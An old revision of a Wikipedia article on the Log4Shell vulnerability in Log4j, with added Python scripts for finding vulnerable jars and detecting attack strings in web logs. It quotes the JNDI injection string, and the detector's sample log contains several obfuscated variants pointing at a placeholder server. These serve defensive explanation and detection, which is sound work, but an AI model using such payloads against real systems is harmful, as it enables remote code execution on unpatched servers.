Log4Shell

From Wikipedia, the free encyclopedia

This is an old revision of this page, as edited by Yeeno at 05:28, 13 December 2021 (Add impact in Canada). The URL of this page is a permanent link to this revision, which may differ significantly from the current revision.

Log4Shell
CVE identifier(s): CVE-2021-44228
Date discovered: 24 November 2021
Date patched: 6 December 2021
Discoverer: Chen Zhaojun of the Alibaba Cloud Security Team[1]
Affected software: Applications logging user input using Log4j

Log4Shell, also known by its CVE number CVE-2021-44228, is a zero-day arbitrary code execution vulnerability in the popular Java logging framework Log4j.[2][3] The vulnerability was reported to Apache by Alibaba's Cloud Security Team on 24 November 2021 and publicly disclosed on 9 December 2021.[1][4][5]

The vulnerability arises because Log4j 2 evaluates lookup expressions of the form ${...} that appear in the text it logs, including JNDI lookups, without restricting which servers or protocols they may reach.[6][2][7] An attacker who can get a string such as ${jndi:ldap://attacker-controlled-host/a} into any logged field (a username, an HTTP User-Agent header, a chat message) causes the application to perform a JNDI lookup against that attacker-controlled LDAP server, which can answer with a reference to a remote Java class that the JVM then loads and executes.[5] Affected services include Cloudflare, iCloud, the Java edition of Minecraft, and Steam.[6] Lunasec characterised the vulnerability as "a design failure of catastrophic proportions"[5] and Tenable as "the single biggest, most critical vulnerability of the last decade".[8] The Apache Software Foundation, of which Log4j is a project, gave Log4Shell a CVSS rating of 10, the highest available score.[9]

Background

Log4j is an open source logging framework that allows software developers to log various data within their application. This data can also include user input.[10] It is used ubiquitously in Java applications, especially enterprise software.[5] Originally written in 2001 by Ceki Gülcü, it is now part of Apache Logging Services, a project of the Apache Software Foundation.[11]

Mitigation

Fixes for this vulnerability were released on 6 December 2021, three days before the vulnerability was published, in Log4j version 2.15.0-rc1.[12] The fix disables message lookups by default and restricts the servers and protocols that JNDI lookups may use, which can be configured through several system properties. This supersedes the system property log4j2.formatMsgNoLookups, which exists in versions 2.10 through 2.14.1 and, when set to true, mitigates the vulnerability in those versions; earlier 2.x versions lack the property and can instead be mitigated by removing the JndiLookup class from the log4j-core jar.[13][7][9] Additionally, all features using JNDI, on which this vulnerability was based, are disabled by default from the next release onwards (published as version 2.16.0).[14]
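As an added example (not code from this page or from the Apache Log4j project), the following Python script applies the version and mitigation rules above to a log4j-core jar: it reads the bundled pom.properties to learn the version, checks whether org/apache/logging/log4j/core/lookup/JndiLookup.class is present, and decides whether the installation is fixed, mitigated or vulnerable. The JVM's system properties and environment are taken as inputs because a jar on disk cannot reveal them; they have to be collected from the running process (for example with jcmd <pid> VM.system_properties). It also shows the class-removal mitigation, which does in Python what the zip -q -d command Apache recommended for versions without the formatMsgNoLookups property does on the command line. The jar it inspects is constructed in memory, the version thresholds are those stated on this page, and the function names are the author's own.

```python
import io
import re
import zipfile
from pathlib import Path

# Entries that identify a log4j-core jar and its JNDI lookup plugin.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

# Thresholds as described on this page: the fix shipped in 2.15.0 and the
# log4j2.formatMsgNoLookups property exists only from 2.10 onwards.
FIXED_IN = (2, 15, 0, 0)
PROPERTY_SINCE = (2, 10, 0, 0)


def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a comparable tuple.

    Pre-release builds (-beta, -rc) sort below the final release of the same
    number, so the scanner never treats them as newer than they are.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(-.+)?", text.strip())
    if not m:
        return None
    major, minor, patch, suffix = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if suffix is None else -1)


def inspect_jar(data):
    """Return the log4j-core version and whether JndiLookup.class is present."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        return {"version": version, "has_jndi_lookup": JNDI_CLASS in names}


def assess(version, has_jndi_lookup, jvm_props=None, env=None):
    """Classify one installation as 'fixed', 'mitigated', 'vulnerable' or 'unknown'."""
    jvm_props = jvm_props or {}
    env = env or {}
    parsed = parse_version(version) if version else None
    if parsed is not None and parsed >= FIXED_IN:
        return "fixed"
    if not has_jndi_lookup:
        # With the lookup class removed, a ${jndi:...} pattern cannot be resolved.
        return "mitigated"
    if parsed is None:
        return "unknown"
    no_lookups = (
        jvm_props.get("log4j2.formatMsgNoLookups", "").lower() == "true"
        or env.get("LOG4J_FORMAT_MSG_NO_LOOKUPS", "").lower() == "true"
    )
    if parsed >= PROPERTY_SINCE and no_lookups:
        return "mitigated"
    # Before 2.10 the property is silently ignored, so it offers no protection.
    return "vulnerable"


def remove_jndi_lookup(data):
    """Rebuild the jar without JndiLookup.class (same effect as `zip -q -d`)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            if item.filename != JNDI_CLASS:
                dst.writestr(item, src.read(item.filename))
    return out.getvalue()


def scan_directory(root, jvm_props=None, env=None):
    """Assess every *.jar under root. Jars nested inside WAR/EAR files are not opened."""
    findings = []
    for path in Path(root).rglob("*.jar"):
        info = inspect_jar(path.read_bytes())
        verdict = assess(info["version"], info["has_jndi_lookup"], jvm_props, env)
        findings.append((str(path), info["version"], verdict))
    return findings


def make_sample_jar(version, include_jndi_lookup=True):
    """Constructed stand-in for a log4j-core jar; the class entry is a placeholder, not bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\n"
                               f"version={version}\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    jar = make_sample_jar("2.14.1")
    info = inspect_jar(jar)
    print(info, assess(info["version"], info["has_jndi_lookup"]))
    print(assess(info["version"], True, jvm_props={"log4j2.formatMsgNoLookups": "true"}))
    stripped = inspect_jar(remove_jndi_lookup(jar))
    print(stripped, assess(stripped["version"], stripped["has_jndi_lookup"]))
```

Two caveats for real deployments: fat jars, WAR and EAR files embed log4j-core as a nested jar, so a production scanner has to recurse into archives rather than stop at the first zip, and a jar whose pom.properties was stripped by shading is reported as "unknown" rather than guessed at.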

Newer versions of the Java runtime also reduce exposure: since JDK 8u121 for RMI and 8u191 for LDAP, the JNDI client no longer loads classes from a remote codebase by default (the com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.ldap.object.trustURLCodebase properties default to false).[2][15] This is not a complete mitigation. The attacker-controlled server can still return a serialized Java object, or a reference to a factory class that is already present on the application's classpath, and so achieve code execution in certain applications; updating the JRE therefore does not remove the need to patch or mitigate Log4j itself.

Response and impact

In the United States, the director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly, termed the exploit "critical" and advised vendors to prioritize software updates,[16] and the Canadian Centre for Cyber Security (CCC) called on organisations to take immediate action.[17] The analogous German agency, the Bundesamt für Sicherheit in der Informationstechnik (BSI), designated the exploit as being at its highest threat level, calling it an "extremely critical threat situation" (translated). The BSI also reported that several attacks had already succeeded and that the real impact of the situation was hard to assess.[18][19]

According to cybersecurity firm GreyNoise, several IP addresses were scanning the internet for servers that had the vulnerability.[20] The Canada Revenue Agency temporarily shut down its online services after learning of the exploit, while the Government of Quebec closed almost 4000 of its websites as a "preventative measure".[21]

System administrators were advised to assess their exposure and put mitigations in place as quickly as possible, either by updating the library or, where an update was not yet possible, by disabling lookups with the system property (log4j2.formatMsgNoLookups=true).[22]
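The lookup behaviour described in the overview above, and the scanning activity reported by GreyNoise, both come down to the same string arriving in a logged field. As an added example, not taken from this page or from any vendor's tooling, the following Python script turns that into detection over web-server access logs. It first collapses the nested lookups attackers use to hide the string (${lower:...}, ${upper:...} and the :- default syntax, which Log4j evaluates from the inside out) and undoes URL encoding, then matches the resulting ${jndi:...} expression regardless of case or scheme, and flags any other surviving lookup as suspicious because Log4j would evaluate it too. The normalisation is a deliberately small approximation of Log4j's StrSubstitutor, not a reimplementation; the log lines are constructed for the example and the 203.0.113.0/24 addresses are a documentation range.

```python
import re
from urllib.parse import unquote

# Innermost ${...} expression: one with no further ${ or } inside its body.
INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalisation, a JNDI lookup with whatever scheme follows (ldap, ldaps, rmi, dns, ...).
JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)
# Any lookup that survived normalisation (e.g. ${date:...}); Log4j would evaluate it as well.
LOOKUP = re.compile(r"\$\{[^}]*\}")


def resolve_one(body):
    """Resolve the obfuscation lookups attackers use, approximating Log4j's StrSubstitutor.

    Handles ${lower:X}, ${upper:X} and the ':-' default syntax; an unknown lookup that
    carries a default collapses to that default. Returns None for anything else (jndi
    included) so the caller leaves it in place where it can still be matched.
    """
    default = None
    if ":-" in body:
        body, default = body.split(":-", 1)
    prefix, _, key = body.partition(":")
    prefix = prefix.lower()  # Log4j lower-cases the lookup prefix before dispatching
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if default is not None:
        return default
    return None


def normalize_lookups(text, max_rounds=32):
    """Collapse nested lookups from the inside out until nothing more resolves."""
    for _ in range(max_rounds):
        changed = False

        def replace(match):
            nonlocal changed
            resolved = resolve_one(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNER.sub(replace, text)
        if not changed:
            break
    return text


def classify(line):
    """Return (verdict, indicators) for one log line: 'jndi', 'lookup' or 'clean'."""
    normalized = normalize_lookups(unquote(line))  # unquote handles %24%7B-style encoding
    hits = JNDI.findall(normalized)
    if hits:
        return "jndi", hits
    leftovers = LOOKUP.findall(normalized)
    if leftovers:
        return "lookup", leftovers
    return "clean", []


def scan_lines(lines):
    """Classify every line, keeping the 1-based line number for triage."""
    return [{"line": n, "verdict": verdict, "indicators": indicators}
            for n, (verdict, indicators) in enumerate((classify(l) for l in lines), start=1)]


# Constructed access-log lines; not real traffic. The last one carries a harmless-looking
# lookup that is still abnormal in a User-Agent and is reported as 'lookup'.
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:RMI}://203.0.113.5:1099/a}"',
    '10.0.0.10 - - [10/Dec/2021:03:14:12 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.11 - - [10/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${date:yyyy}"',
]

if __name__ == "__main__":
    for result in scan_lines(SAMPLE_LOG):
        print(result["line"], result["verdict"], result["indicators"])
```

Matching on the literal text jndi: alone misses the second and third attack lines above, which is why the normalisation step comes first; conversely, a line that is only "lookup" is worth a look but not an alert on its own, since some applications legitimately log configuration strings that contain ${...}.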

References

  1. "Log4Shell Vulnerability is the Coal in our Stocking for 2021". McAfee. 10 December 2021. Retrieved 12 December 2021.
  2. "Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package". LunaSec (www.lunasec.io). 9 December 2021. Retrieved 12 December 2021.
  3. "CVE - CVE-2021-44228". cve.mitre.org. Retrieved 12 December 2021.
  4. "Worst Apache Log4j RCE Zero day Dropped on Internet". www.cyberkendra.com. 9 December 2021. Retrieved 12 December 2021.
  5. Newman, Lily Hay. "'The Internet Is on Fire'". Wired. ISSN 1059-1028. Retrieved 12 December 2021.
  6. "Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit". PCMag (www.pcmag.com). Retrieved 12 December 2021.
  7. Goodin, Dan (10 December 2021). "Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet". Ars Technica. Retrieved 12 December 2021.
  8. Associated Press (11 December 2021). "Recently uncovered software flaw 'most critical vulnerability of the last decade'". The Guardian. Retrieved 12 December 2021.
  9. "Log4j – Apache Log4j Security Vulnerabilities". logging.apache.org. Retrieved 12 December 2021.
  10. Yan, Tao; Deng, Qi; Zhang, Haozhe; Fu, Yu; Grunzweig, Josh (10 December 2021). "Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228)". Unit 42, Palo Alto Networks.
  11. "Log4j – Apache Log4j 2". logging.apache.org. Retrieved 12 December 2021.
  12. "Restrict LDAP access via JNDI by rgoers - Pull Request #608 - apache/logging-log4j2". GitHub. 5 December 2021. Retrieved 12 December 2021.
  13. "LOG4J2-3198: Log4j2 no longer formats lookups in messages by default". GitHub. 5 December 2021.
  14. "LOG4J2-3208: Disable JNDI by default". issues.apache.org. 11 December 2021.
  15. "Java(TM) SE Development Kit 8, Update 121 (JDK 8u121) Release Notes". Oracle. Retrieved 12 December 2021.
  16. "Statement from CISA Director Easterly on "Log4j" Vulnerability". CISA. 11 December 2021.
  17. "Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action". Government of Canada. 12 December 2021.
  18. "BSI warnt vor Sicherheitslücke" [BSI warns of security vulnerability]. Tagesschau (in German). 12 December 2021.
  19. "Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage" [Red alert: Log4Shell vulnerability causes extremely critical threat situation]. BSI press service (in German). 12 December 2021.
  20. "Apache Log4j RCE Attempts". GreyNoise (www.greynoise.io). Retrieved 12 December 2021.
  21. "Facing cybersecurity threats, Quebec shuts down government websites for evaluation". CBC News. 12 December 2021. Retrieved 12 December 2021.
  22. "Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability Under Exploitation". CISA. Retrieved 12 December 2021.

External links

Log4j website